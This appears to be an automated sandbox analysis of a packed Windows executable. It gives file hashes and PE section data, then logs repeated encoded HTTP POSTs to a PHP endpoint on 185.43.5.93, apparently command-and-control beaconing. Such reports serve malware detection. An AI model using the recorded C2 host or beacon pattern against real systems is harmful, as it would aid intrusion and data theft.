SSDEEP:	12:Pkl5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:sfdUOAokItULVDv
MD5:	032C705D3EE087290604BFC8E0242F88
SHA1:	E7CB57DE13AC98A3C8735758A1C4294DB66543E5
SHA-256:	6160273CADF8F850FB0EA0A535C233596D736ED11EFDF4FC1E09F687C46B64E2
SHA-512:	EDE27B27A72F86E8F1AB727BED2CD1335BF1A8675B3ABE2B6D896999B3A8265905446F612BC7F86F2CC8C1B0585092BC74B36F5838809C85419A0A34CC6CDEE6
Malicious:	false
Preview:	..Pinging 066656 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	7.875768293601397
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	KyC6hVwU8Z.exe
File size:	1'341'440 bytes
MD5:	a8c535490feb18fdff588d94c0d8a889
SHA1:	7e8660d2481014bdf84814273573b921202c67e6
SHA256:	5f4e7c6f450d28136464acb431e1ec1be7812fc72f9eeede3b767f4e0194801b
SHA512:	d858372eb3f87af450b33ecbbb989b97a11dfc4cfd0ae7aee612b43b015b1ff23a2fabcccd0f751fdd78278549a623a895efebcc50964155c15aa1f1e56191dc
SSDEEP:	24576:4sQst5PapBfSRvZ2acs9504+O4cgjqOM0JrK1PxNhiFlGHDTyoy9mX5BifNpttmw:4CZ8WOs50Z3NjnM0J4DhiHIDW9mXyfNt
TLSH:	78551283F5A340A3F79354B01B24C9E5C419BDB37B151CCB61588159AAF4ACBCB7BA23
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...w.$g.............................d............@.......................................@.....................................(..

Entrypoint:	0x4464d0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6724E277 [Fri Nov 1 14:15:19 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	79c892efe640fd61fcdafaed00816c87

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x61dc8	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x67000	0x1910	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x5b7c0	0xc0	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x61f20	0x130	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x59e6a	0x5a000	5d580fc783dfdd8a266e091e082f30cf	False	0.66435546875	data	7.0802944473385505	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x5b000	0x7eb4	0x8000	a3f8ada3ed32443a7f4cdc8946ef07e5	False	0.459869384765625	OpenPGP Public Key	5.119166936059444	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x63000	0x226c	0x1000	8e2085cae6a0e440569f70b4c52b96ec	False	0.484619140625	data	5.081762228755209	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x66000	0x8	0x200	71b14cd0690fc82caf94afcf4d5a7de2	False	0.03125	data	0.06116285224115448	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x67000	0x1910	0x1a00	4b35946be7aa56a8bbb45bdb9cec7036	False	0.7639723557692307	data	6.366822996232983	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.back	0x69000	0xe1600	0xe2600	104d169661d0dd151a2654a312b3daa4	False	1.0003138373136389	data	7.999820672261007	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:12.846340895 CET	302	OUT	POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 185.43.5.93 Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:33:13.205267906 CET	344	OUT	Data Raw: 05 06 01 00 06 0d 01 02 05 06 02 01 02 07 01 03 00 01 05 0a 02 04 03 0e 07 04 0d 0c 03 0e 01 06 0d 01 04 5d 02 50 05 52 0b 0b 07 06 07 01 04 04 03 03 0f 00 0d 03 07 06 06 54 06 04 07 0a 05 58 05 07 0f 0d 00 04 07 51 0f 01 0f 02 0f 50 0f 04 07 53 Data Ascii: ]PRTXQPSRR\L~hY~Mc\maKsTRWwR^~`lIxo{Jxc~DhmZAwwliO~V@Ax}~O}ri
Dec 10, 2024 07:33:14.185507059 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:33:14.290899992 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:33:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 35 37 34 0d 0a 56 4a 7d 5d 78 6d 67 07 78 4c 60 48 6b 72 7b 01 6a 01 73 4f 7e 70 72 54 7a 5d 68 4f 7e 72 60 49 60 60 75 0c 7b 62 62 5f 76 76 6b 5f 6a 4b 78 01 55 4b 72 50 60 4c 73 07 68 72 6a 58 7c 67 5b 52 78 48 73 52 7d 4d 5e 58 76 62 7d 04 60 4f 69 04 7f 61 7a 49 6a 52 73 50 7d 59 77 03 76 66 7b 06 7c 5b 6d 05 7e 73 6d 00 78 67 6f 5c 78 74 74 4f 78 53 55 49 79 5c 7b 5a 6f 63 6e 4c 6b 60 6c 44 6c 67 77 59 6a 61 7b 4e 75 58 60 48 7a 51 41 5b 7c 59 77 51 7c 62 7d 0a 75 52 74 07 6f 52 6b 58 74 60 61 52 79 62 65 02 7c 6c 75 5a 78 4f 66 48 76 4d 6f 49 76 72 64 06 60 61 66 50 7e 5d 79 5f 60 5b 7d 04 76 65 5e 09 7f 6c 66 5c 77 6f 7c 04 7e 70 7c 01 6f 6c 64 5a 7b 4e 66 01 6b 6d 68 08 74 64 7c 04 69 61 7e 09 7e 54 73 0c 6c 6e 62 41 7d 71 76 5a 7b 5d 46 51 7f 52 6c 08 6a 60 63 51 7d 77 79 5d 7b 0b 6b 4a 6c 62 56 00 68 5f 7b 44 6a 59 7b 08 7c 06 61 0a 79 73 7f 58 7d 62 6f 5b 74 63 79 51 7b 5c 79 06 75 48 56 03 7c 66 78 4d 7e 58 6d 0d 74 62 63 07 7d 62 5b 4c 7f 59 72 08 78 76 68 08 7e 4d 77 49 75 72 69 03 77 [TRUNCATED] Data Ascii: 574VJ}]xmgxL`Hkr{jsO~prTz]hO~r`I``u{bb_vvk_jKxUKrP`LshrjX\|g[RxHsR}M^Xvb}`OiazIjRsP}Ywvf{\|[m~smxgo\xttOxSUIy\{ZocnLk`lDlgwYja{NuX`HzQA[\|YwQ\|b}uRtoRkXt`aRybe\|luZxOfHvMoIvrd`afP~]y_`[}ve^lf\wo\|~p\|oldZ{Nfkmhtd\|ia~~TslnbA}qvZ{]FQRlj`cQ}wy]{kJlbVh_{DjY{\|aysX}bo[tcyQ{\yuHV\|fxM~Xmtbc}b[LYrxvh~MwIuriwaaJ~qj~ld~wIu_YI{r_}^}xIR{I`xScy\lzsPA``{w`K}rQOwqlJ~\|UwZBaSvl`A{lxt^vzau}lzxaXvM{uaxNwOn@Nfvr[Lve^latRp~shJyl{{N~\|mttYl~LfB~msxCrL}rSM}`dOBhph~Yb{CUDxrhFqw~wwA\|N[{sZ}rpwsuA{a[DufVE}XhM}fywLUKb[O\|gbC{H^O~s{Hu\SOwaa~qr\|x~gwDua{{\i~pmDygxM{YhL{SwyLpxMr{]NZlYRIib{bb`}RswthqSvBlxltK`^bz_zZ~Rv_z\y\}b`g{ZL~Jx^}_vqbXaetUaMcU\|O\|]loB{xcvC^twQ]jqbzSYQcT[]jafS\|sBhowSYgQRdSGWtXc~{GUrdYWvNHSZfP`ET[cHZvK}\GZaxjfg[vjTwacJ}rSMhYTClf{P}Zwwqmc_j]kavXVFPjdE[rJoTEkr_UkoXUh\yP{{\dy]rOMJ{YRZu\|YbbGQp`\Sd^kX]kp\|S]]MucV~BzQD_oeG[pNbYCa}Uk_A[_qqZTUAro[sGx^NZl`DVsKhULasZj[NQRxNo~b [TRUNCATED]
Dec 10, 2024 07:33:14.291258097 CET	358	IN	Data Raw: 5e 5f 51 60 5a 6f 06 79 70 59 47 5a 5a 43 51 78 76 7a 5d 62 65 08 45 51 7a 67 59 51 65 0d 5e 60 04 0b 02 50 58 62 4c 57 66 7d 4f 6c 75 6c 51 7c 5e 78 66 6d 4f 71 45 70 58 5c 5c 53 06 71 42 54 6f 51 49 52 5f 0b 59 5a 06 64 45 51 7e 72 05 67 59 7e Data Ascii: ^_Q`ZoypYGZZCQxvz]beEQzgYQe^`PXbLWf}OlulQ\|^xfmOqEpX\\SqBToQIR_YZdEQ~rgY~Gl`p_o@Wa`]muweQpqhltZzp]ia@Z}c^RoTkMVrXLbodZcg~}^rzQD_oeG[pNbYCayOSZaG[[n@\tPSoe\vQszSsW{tpWceJSnwQpZN_jaNP~No[ChH_Vs]VokUy^^Q}wvA{CgD
Dec 10, 2024 07:33:14.324624062 CET	278	OUT	POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 185.43.5.93 Content-Length: 384 Expect: 100-continue
Dec 10, 2024 07:33:14.673285007 CET	384	OUT	Data Raw: 5a 52 5c 5c 5d 5d 53 5b 58 5f 51 55 5a 57 58 5d 56 52 58 5e 56 5d 50 5a 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59 Data Ascii: ZR\\]]S[X_QUZWX]VRX^V]PZPV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_["\-"0!Q #)];"3(+?!U#,3?%Q>;3$[&(!^" \)
Dec 10, 2024 07:33:14.765646935 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:33:15.131705046 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:33:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 09 1f 25 00 21 2f 3f 03 26 05 05 54 27 3a 08 54 3c 09 31 04 3c 02 04 5b 28 20 27 05 28 3b 39 5a 22 0a 37 04 24 2d 04 56 33 11 04 52 31 24 2e 5e 0c 10 3b 06 21 01 3b 03 28 58 33 59 29 2c 3a 1e 2a 02 38 03 27 3c 2f 11 24 3a 24 01 26 3b 3a 0d 30 2c 2a 03 3d 2a 2e 5d 28 31 30 1f 31 38 2e 56 0b 12 23 1c 29 3a 3c 58 24 04 3b 1f 3d 2d 3a 1f 37 04 3a 5a 37 12 3c 05 36 06 2e 5a 2a 54 28 5e 24 0f 20 0c 27 07 2f 03 23 05 36 0f 25 32 24 50 2c 0d 28 55 03 3e 57 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98%!/?&T':T<1<[( '(;9Z"7$-V3R1$.^;!;(X3Y),:8'</$:$&;:0,=.](1018.V#):<X$;=-:7:Z7<6.ZT(^$ '/#6%2$P,(U>WT0
Dec 10, 2024 07:33:15.206686020 CET	279	OUT	POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 185.43.5.93 Content-Length: 1764 Expect: 100-continue
Dec 10, 2024 07:33:15.563961983 CET	1764	OUT	Data Raw: 5a 53 59 5a 5d 53 53 5a 58 5f 51 55 5a 5a 58 50 56 57 58 58 56 5a 50 5d 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59 Data Ascii: ZSYZ]SSZX_QUZZXPVWXXVZP]PV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_["8!>0U 0!Z;)>^'=7Z(/-#+P)2=+B$-Z0!^" \)1
Dec 10, 2024 07:33:15.647706985 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:33:16.023825884 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:33:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 09 1f 25 04 34 3f 20 1e 25 5d 34 0d 33 04 31 0d 3f 09 0c 16 2b 05 2d 05 2b 23 09 04 3f 38 3d 5c 22 24 28 15 27 3d 00 54 30 2f 3a 57 26 1e 2e 5e 0c 10 38 16 21 3b 3b 02 2b 10 3f 12 29 59 3e 5b 28 3c 02 02 27 2f 3f 59 26 29 2b 58 33 38 36 0d 24 5a 3d 5d 29 39 2e 58 28 22 38 1d 32 38 2e 56 0b 12 20 0a 2a 07 38 13 27 2e 33 57 3d 2d 26 55 34 14 26 5b 21 3f 3f 58 35 06 0c 59 2a 1c 20 5e 27 22 27 1f 30 2a 20 5d 20 12 0f 57 26 18 24 50 2c 0d 28 55 03 3e 57 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98%4? %]431?+-+#?8=\"$('=T0/:W&.^8!;;+?)Y>[(<'/?Y&)+X386$Z=])9.X("828.V 8'.3W=-&U4&[!??X5Y ^'"'0* ] W&$P,(U>WT0

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:14.846919060 CET	279	OUT	POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 185.43.5.93 Content-Length: 1048 Expect: 100-continue
Dec 10, 2024 07:33:15.204730988 CET	1048	OUT	Data Raw: 5f 5f 59 5a 5d 5a 56 5c 58 5f 51 55 5a 5a 58 50 56 5b 58 54 56 5a 50 50 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59 Data Ascii: __YZ]ZV\X_QUZZXPV[XTVZPPPV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_[!-!*33=P4 >8:"3(??S /?V+&(8!$73!^" \)1
Dec 10, 2024 07:33:16.186197042 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:33:16.419662952 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:33:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 57 5f 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;W_T0

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:17.289678097 CET	303	OUT	POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 185.43.5.93 Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:33:17.642237902 CET	1048	OUT	Data Raw: 5f 54 59 58 5d 5a 53 58 58 5f 51 55 5a 5f 58 57 56 5b 58 54 56 59 50 58 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59 Data Ascii: _TYX]ZSXX_QUZ_XWV[XTVYPXPV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_[!;5C035Q #;*$>8+?-T ,(15Q>9E'[4[&(!^" \)%
Dec 10, 2024 07:33:18.735337019 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:33:18.854969978 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:33:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 57 5f 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;W_T0

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:20.778395891 CET	279	OUT	POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 185.43.5.93 Content-Length: 1048 Expect: 100-continue
Dec 10, 2024 07:33:21.126540899 CET	1048	OUT	Data Raw: 5f 50 59 5f 58 5d 56 58 58 5f 51 55 5a 5f 58 5c 56 51 58 5f 56 51 50 5a 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59 Data Ascii: _PY_X]VXX_QUZ_X\VQX_VQPZPV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_[!/2"'> U=\,\6\0-7X("4?#Q)19>]9D'=<[$!^" \)%
Dec 10, 2024 07:33:22.105420113 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:33:22.341228008 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:33:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 57 5f 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;W_T0

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:21.235797882 CET	279	OUT	POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 185.43.5.93 Content-Length: 1764 Expect: 100-continue
Dec 10, 2024 07:33:21.595134020 CET	1764	OUT	Data Raw: 5f 50 5c 5d 5d 52 53 5b 58 5f 51 55 5a 56 58 57 56 54 58 5b 56 51 50 5e 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59 Data Ascii: _P\]]RS[X_QUZVXWVTX[VQP^PV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_["Y/5$U"#810>#Z<%R# +":*1A3=?'!^" \)
Dec 10, 2024 07:33:22.507153988 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:33:22.743738890 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:33:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 09 1f 26 58 34 2f 20 10 31 3b 23 12 30 14 31 09 28 19 26 15 3f 02 36 59 3c 0d 34 14 3c 16 2e 03 22 1a 0e 58 26 3e 36 11 30 3f 0b 0f 24 34 2e 5e 0c 10 38 17 21 01 30 5b 28 00 2b 5a 3d 2f 08 59 2a 3c 3c 03 26 3c 05 12 26 39 38 00 30 06 14 0a 24 2c 3d 59 3e 07 0c 13 3c 1f 0a 56 31 38 2e 56 0b 12 23 1c 3d 00 3c 58 24 3d 33 1d 28 3d 2a 1e 22 39 32 5b 23 5a 20 03 36 06 03 03 3e 0c 38 59 24 1f 28 0a 27 3a 3b 07 23 02 3a 09 31 08 24 50 2c 0d 28 55 03 3e 57 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98&X4/ 1;#01(&?6Y<4<."X&>60?$4.^8!0[(+Z=/Y<<&<&980$,=Y><V18.V#=<X$=3(="92[#Z 6>8Y$(':;#:1$P,(U>WT0

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:23.135458946 CET	279	OUT	POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 185.43.5.93 Content-Length: 1048 Expect: 100-continue
Dec 10, 2024 07:33:23.485750914 CET	1048	OUT	Data Raw: 5f 54 59 5f 5d 5d 53 5f 58 5f 51 55 5a 5f 58 50 56 53 58 54 56 5c 50 5d 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59 Data Ascii: _TY_]]S_X_QUZ_XPVSXTV\P]PV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_["\,'U9 ",:!$<+/6#Z3P+19U)=00!^" \)%
Dec 10, 2024 07:33:24.473460913 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:33:24.707362890 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:33:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 57 5f 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;W_T0

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:25.048027039 CET	303	OUT	POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 185.43.5.93 Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:33:25.407638073 CET	1048	OUT	Data Raw: 5a 55 5c 5f 5d 5b 56 5a 58 5f 51 55 5a 56 58 56 56 53 58 59 56 5b 50 5b 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59 Data Ascii: ZU\_][VZX_QUZVXVVSXYV[P[PV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_[!/E30" 3Y;>3'\?<)V!?#P)!)Q=(9'=708!^" \)
Dec 10, 2024 07:33:26.375740051 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:33:26.611702919 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:33:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 57 5f 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;W_T0

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:26.866580963 CET	303	OUT	POST /5/4Datalife/asynccpu3Generator/VmPipePollHttpgeoprocessserver.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 185.43.5.93 Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:33:27.220108032 CET	1048	OUT	Data Raw: 5f 53 5c 59 58 5d 56 5a 58 5f 51 55 5a 5d 58 53 56 51 58 5a 56 5b 50 5d 50 56 5b 5c 53 5d 5b 5c 5c 45 56 54 5a 5c 50 53 59 5e 55 54 58 52 51 59 5a 5c 42 56 5a 5d 5a 5f 50 5b 55 5f 51 5a 58 5e 54 5d 5d 5e 5e 59 55 5c 5a 5b 5d 58 5f 5d 43 56 5c 59 Data Ascii: _S\YX]VZX_QUZ]XSVQXZV[P]PV[\S][\\EVTZ\PSY^UTXRQYZ\BVZ]Z_P[U_QZX^T]]^^YU\Z[]X_]CV\YR[TXX[STZ]^ZQU][YVR\G\Z[\UQ[\P[]XP]Z\Z_YXXRUB_YV]V\__][^_U[E^PSWQYSPT]YZASS^V^BYXX_ZXXPTZT_SXR[P_Z]Y_["\;2=$ !U#3=;*-'=?<5V4/W+U)5A0=$[0!^" \)-

Timestamp	Bytes transferred	Direction	Data
